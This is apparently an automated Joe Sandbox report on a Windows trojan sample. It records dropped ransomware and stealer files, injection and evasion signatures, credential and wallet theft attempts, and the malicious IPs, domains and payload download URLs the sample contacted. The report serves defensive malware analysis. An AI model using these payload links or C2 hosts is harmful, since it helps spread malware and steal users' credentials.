DIGITALOCEAN-ASNUS Netherlands 30->107 109 11 other IPs or domains 30->109 79 C:\Users\user\AppData\Roaming\rifsswe, PE32 30->79 dropped 81 C:\Users\user\AppData\Local\Temp\F65C.exe, PE32 30->81 dropped 83 C:\Users\user\AppData\Local\Temp748.exe, PE32 30->83 dropped 85 9 other malicious files 30->85 dropped 111 System process connects to network (likely due to code injection or exploit) 30->111 113 Benign windows process drops PE files 30->113 115 Deletes itself after installation 30->115 117 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->117 35 DB31.exe 30->35         started        38 E748.exe 2 30->38         started        41 F65C.exe 3 30->41         started        43 2 other processes 30->43 file11 signatures12 process13 dnsIp14 127 Detected unpacking (changes PE section rights) 35->127 129 Detected unpacking (overwrites its own PE header) 35->129 131 Found evasive API chain (may stop execution after checking mutex) 35->131 149 4 other signatures 35->149 71 C:\Users\user\AppData\Local\...\gecrjwsv.exe, PE32 38->71 dropped 133 Machine Learning detection for dropped file 38->133 151 2 other signatures 38->151 46 cmd.exe 1 38->46         started        49 cmd.exe 2 38->49         started        51 sc.exe 1 38->51         started        59 3 other processes 38->59 73 C:\Users\user\AppData\Local\...\F65C.exe.log, ASCII 41->73 dropped 135 Antivirus detection for dropped file 41->135 137 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 41->137 139 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 41->139 141 Injects a PE file into a foreign processes 41->141 53 F65C.exe 41->53         started        99 185.163.204.24 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 43->99 101 185.163.45.70, 80 MIVOCLOUDMD Moldova Republic of 43->101 103 185.163.204.22, 49910, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 43->103 75 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 43->75 dropped 143 Multi AV Scanner detection for dropped file 43->143 145 Tries to steal Mail credentials (via file / registry access) 43->145 147 Tries to harvest and steal browser information (history, passwords, etc) 43->147 57 WerFault.exe 23 9 43->57         started        file15 signatures16 process17 dnsIp18 77 C:\Windows\SysWOW64\...\gecrjwsv.exe (copy), PE32 46->77 dropped 61 conhost.exe 46->61         started        63 conhost.exe 49->63         started        65 conhost.exe 51->65         started        93 86.107.197.138, 38133, 49882 MOD-EUNL Romania 53->93 163 Tries to steal Crypto Currency Wallets 53->163 67 conhost.exe 59->67         started        69 conhost.exe 59->69         started        file19 signatures20 process21

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          tijXCZsbGe.exe34%VirustotalBrowse
                          tijXCZsbGe.exe40%ReversingLabsWin32.Trojan.Generic
                          tijXCZsbGe.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\gecrjwsv.exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Users\user\AppData\Local\Temp\F65C.exe100%AviraHEUR/AGEN.1211353
                          C:\Users\user\AppData\Local\Temp\5C89.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\rifsswe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\DB31.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\gecrjwsv.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\9334.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\6FB4.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\B0F7.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\F65C.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\C7FA.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\8783.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\9DFA.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\E748.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\5C89.exe34%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\5C89.exe77%ReversingLabsWin32.Ransomware.StopCrypt
                          C:\Users\user\AppData\Local\Temp\6FB4.exe29%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\6FB4.exe81%ReversingLabsWin32.Trojan.Raccrypt
                          C:\Users\user\AppData\Local\Temp\9334.exe46%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\9334.exe77%ReversingLabsWin32.Trojan.Raccoon
                          C:\Users\user\AppData\Local\Temp\B0F7.exe34%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\B0F7.exe77%ReversingLabsWin32.Ransomware.StopCrypt

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          18.0.F65C.exe.ab0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          11.0.9334.exe.480e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          16.3.DB31.exe.660000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          16.2.DB31.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          10.0.rifsswe.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                          11.0.9334.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          11.3.9334.exe.5f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          35.0.F65C.exe.400000.6.unpack100%AviraHEUR/AGEN.1145065Download File
                          18.0.F65C.exe.ab0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          32.2.gecrjwsv.exe.580e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          1.0.tijXCZsbGe.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          10.0.rifsswe.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                          38.3.5C89.exe.4d40000.2.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
                          35.0.F65C.exe.4d0000.13.unpack100%AviraHEUR/AGEN.1211353Download File
                          10.0.rifsswe.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                          35.0.F65C.exe.4d0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.0.tijXCZsbGe.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          10.0.rifsswe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          11.0.9334.exe.480e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          34.2.svchost.exe.5d0000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          35.0.F65C.exe.4d0000.7.unpack100%AviraHEUR/AGEN.1211353Download File
                          35.0.F65C.exe.4d0000.11.unpack100%AviraHEUR/AGEN.1211353Download File
                          35.0.F65C.exe.400000.10.unpack100%AviraHEUR/AGEN.1145065Download File
                          0.2.tijXCZsbGe.exe.5615a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          35.0.F65C.exe.400000.4.unpack100%AviraHEUR/AGEN.1145065Download File
                          32.3.gecrjwsv.exe.5a0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          11.0.9334.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          18.0.F65C.exe.ab0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          35.0.F65C.exe.4d0000.5.unpack100%AviraHEUR/AGEN.1211353Download File
                          35.0.F65C.exe.400000.8.unpack100%AviraHEUR/AGEN.1145065Download File
                          1.1.tijXCZsbGe.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          11.2.9334.exe.480e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          35.0.F65C.exe.4d0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          18.0.F65C.exe.ab0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          35.0.F65C.exe.4d0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.2.tijXCZsbGe.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          35.0.F65C.exe.4d0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          10.2.rifsswe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          17.2.E748.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          10.0.rifsswe.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                          11.2.9334.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          17.3.E748.exe.650000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          9.2.rifsswe.6315a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          18.2.F65C.exe.ab0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          35.0.F65C.exe.400000.12.unpack100%AviraHEUR/AGEN.1145065Download File
                          32.2.gecrjwsv.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          16.2.DB31.exe.640e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          10.0.rifsswe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          38.2.5C89.exe.400000.0.unpack100%AviraHEUR/AGEN.1127993Download File
                          32.2.gecrjwsv.exe.5a0000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                          10.0.rifsswe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          35.0.F65C.exe.4d0000.9.unpack100%AviraHEUR/AGEN.1211353Download File
                          17.2.E748.exe.630e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          10.1.rifsswe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.tijXCZsbGe.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://185.163.45.70/capibar12%VirustotalBrowse
                          http://185.163.45.70/capibar100%Avira URL Cloudphishing
                          http://185.7.214.171:8080/6.php100%URL Reputationmalware
                          http://host-data-coin-11.com/0%URL Reputationsafe
                          http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c033510%Avira URL Cloudsafe
                          http://185.215.113.35/d2VxjasuwS/index.php12%VirustotalBrowse
                          http://185.215.113.35/d2VxjasuwS/index.php0%Avira URL Cloudsafe
                          http://data-host-coin-8.com/files/6961_1642089187_2359.exe13%VirustotalBrowse
                          http://data-host-coin-8.com/files/6961_1642089187_2359.exe100%Avira URL Cloudmalware
                          http://185.215.113.35/d2VxjasuwS/index.php?scr=10%Avira URL Cloudsafe
                          http://185.163.204.24/0%Avira URL Cloudsafe
                          http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                          http://data-host-coin-8.com/files/8474_1641976243_3082.exe100%Avira URL Cloudmalware
                          http://185.163.45.70/capibarvg100%Avira URL Cloudphishing
                          http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe0%Avira URL Cloudsafe
                          https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://unicupload.top/install5.exe100%URL Reputationphishing
                          http://crl.ver)0%Avira URL Cloudsafe
                          http://185.163.204.22/capibar100%Avira URL Cloudmalware
                          https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                          http://178.62.113.205/capibard0%Avira URL Cloudsafe
                          https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                          https://185.163.204.22/capibar100%Avira URL Cloudmalware
                          http://data-host-coin-8.com/files/7729_1642101604_1835.exe100%Avira URL Cloudmalware
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                          http://185.215.113.35/d2VxjasuwS/plugins/cred.dll100%Avira URL Cloudmalware
                          http://185.163.204.24/220%Avira URL Cloudsafe
                          http://178.62.113.205/capibar0%Avira URL Cloudsafe
                          https://disneyplus.com/legal.0%URL Reputationsafe
                          http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c03350%Avira URL Cloudsafe
                          http://185.163.204.22/capibarp100%Avira URL Cloudmalware
                          http://help.disneyplus.com.0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          unicupload.top
                          		54.38.220.85
                          		truefalse
                            		high
                            host-data-coin-11.com
                            		8.209.70.0
                            		truefalse
                              		high
                              patmushta.info
                              		185.188.183.61
                              		truefalse
                                		high
                                cdn.discordapp.com
                                		162.159.135.233
                                		truefalse
                                  		high
                                  microsoft-com.mail.protection.outlook.com
                                  		40.93.207.0
                                  		truefalse
                                    		high
                                    goo.su
                                    		172.67.139.105
                                    		truefalse
                                      		high
                                      transfer.sh
                                      		144.76.136.153
                                      		truefalse
                                        		high
                                        a0621298.xsph.ru
                                        		141.8.194.74
                                        		truefalse
                                          		high
                                          data-host-coin-8.com
                                          		8.209.70.0
                                          		truefalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://a0621298.xsph.ru/7.exefalse
                                              		high
                                              http://185.7.214.171:8080/6.phptrue
                                              • URL Reputation: malware
                                              		unknown
                                              http://host-data-coin-11.com/false
                                              • URL Reputation: safe
                                              		unknown
                                              http://185.215.113.35/d2VxjasuwS/index.phptrue
                                              • 12%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://data-host-coin-8.com/files/6961_1642089187_2359.exetrue
                                              • 13%, Virustotal, Browse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://185.215.113.35/d2VxjasuwS/index.php?scr=1true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://185.163.204.24/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://data-host-coin-8.com/game.exefalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://data-host-coin-8.com/files/8474_1641976243_3082.exetrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fetrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://unicupload.top/install5.exetrue
                                              • URL Reputation: phishing
                                              		unknown
                                              http://185.163.204.22/capibartrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://a0621298.xsph.ru/9.exefalse
                                                		high
                                                http://data-host-coin-8.com/files/7729_1642101604_1835.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.35/d2VxjasuwS/plugins/cred.dlltrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabF65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://185.163.45.70/capibar5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmptrue
                                                  • 12%, Virustotal, Browse
                                                  • Avira URL Cloud: phishing
                                                  		unknown
                                                  https://duckduckgo.com/ac/?q=F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://support.google.com/chrome/answer/62587845C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://telegram.org/img/t_logo.png5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c033515C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://t.me/capibar5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpfalse
                                                          		high
                                                          https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%25C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://www.google.com/gws_rd=ssl5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://185.163.45.70/capibarvg5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmptrue
                                                                • Avira URL Cloud: phishing
                                                                		unknown
                                                                https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://api.ip.sb/ipF65C.exe, 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, F65C.exe, 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoF65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://crl.ver)svchost.exe, 0000001C.00000002.825450760.000001C021700000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		low
                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=15C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchF65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001C.00000003.802948696.000001C02178F000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802872605.000001C0217A6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.803050058.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802727525.000001C0217A6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802640576.000001C021759000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://178.62.113.205/capibard5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpfalse
                                                                          		high
                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://185.163.204.22/capibar5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              http://185.163.204.24/225C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://178.62.113.205/capibar5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://disneyplus.com/legal.svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://185.163.204.22/capibarp5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://help.disneyplus.com.svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpfalse
                                                                                  		high

                                                                                  Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  185.163.45.70
                                                                                  		unknownMoldova Republic of
                                                                                  		39798MIVOCLOUDMDfalse
                                                                                  40.93.207.0
                                                                                  		microsoft-com.mail.protection.outlook.comUnited States
                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                  185.215.113.35
                                                                                  		unknownPortugal
                                                                                  		206894WHOLESALECONNECTIONSNLtrue
                                                                                  188.166.28.199
                                                                                  		unknownNetherlands
                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                  172.67.139.105
                                                                                  		goo.suUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  86.107.197.138
                                                                                  		unknownRomania
                                                                                  		39855MOD-EUNLfalse
                                                                                  8.209.70.0
                                                                                  		host-data-coin-11.comSingapore
                                                                                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                  54.38.220.85
                                                                                  		unicupload.topFrance
                                                                                  		16276OVHFRfalse
                                                                                  162.159.135.233
                                                                                  		cdn.discordapp.comUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  144.76.136.153
                                                                                  		transfer.shGermany
                                                                                  		24940HETZNER-ASDEfalse
                                                                                  185.233.81.115
                                                                                  		unknownRussian Federation
                                                                                  		50113SUPERSERVERSDATACENTERRUtrue
                                                                                  185.188.183.61
                                                                                  		patmushta.infoRussian Federation
                                                                                  		50113SUPERSERVERSDATACENTERRUfalse
                                                                                  185.7.214.171
                                                                                  		unknownFrance
                                                                                  		42652DELUNETDEtrue
                                                                                  185.186.142.166
                                                                                  		unknownRussian Federation
                                                                                  		204490ASKONTELRUtrue
                                                                                  141.8.194.74
                                                                                  		a0621298.xsph.ruRussian Federation
                                                                                  		35278SPRINTHOSTRUfalse
                                                                                  185.163.204.22
                                                                                  		unknownGermany
                                                                                  		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                                                                  185.163.204.24
                                                                                  		unknownGermany
                                                                                  		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEtrue

                                                                                  Private

                                                                                  IP
                                                                                  192.168.2.1

                                                                                  General Information

                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                  Analysis ID:553073
                                                                                  Start date:14.01.2022
                                                                                  Start time:09:23:23
                                                                                  Joe Sandbox Product:CloudBasic
                                                                                  Overall analysis duration:0h 16m 57s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:light
                                                                                  Sample file name:tijXCZsbGe.exe
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                  Number of analysed new started processes analysed:50
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:1
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • HDC enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@59/23@82/18
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HDC Information:
                                                                                  • Successful, ratio: 25.1% (good quality ratio 19.3%)
                                                                                  • Quality average: 60.8%
                                                                                  • Quality standard deviation: 39.6%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 56%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  Cookbook Comments:
                                                                                  • Adjust boot time
                                                                                  • Enable AMSI
                                                                                  • Found application associated with file extension: .exe
                                                                                  Warnings:
                                                                                  Show All
                                                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                  • TCP Packets have been reduced to 100
                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 20.189.173.22, 40.91.112.76, 20.54.110.249, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179
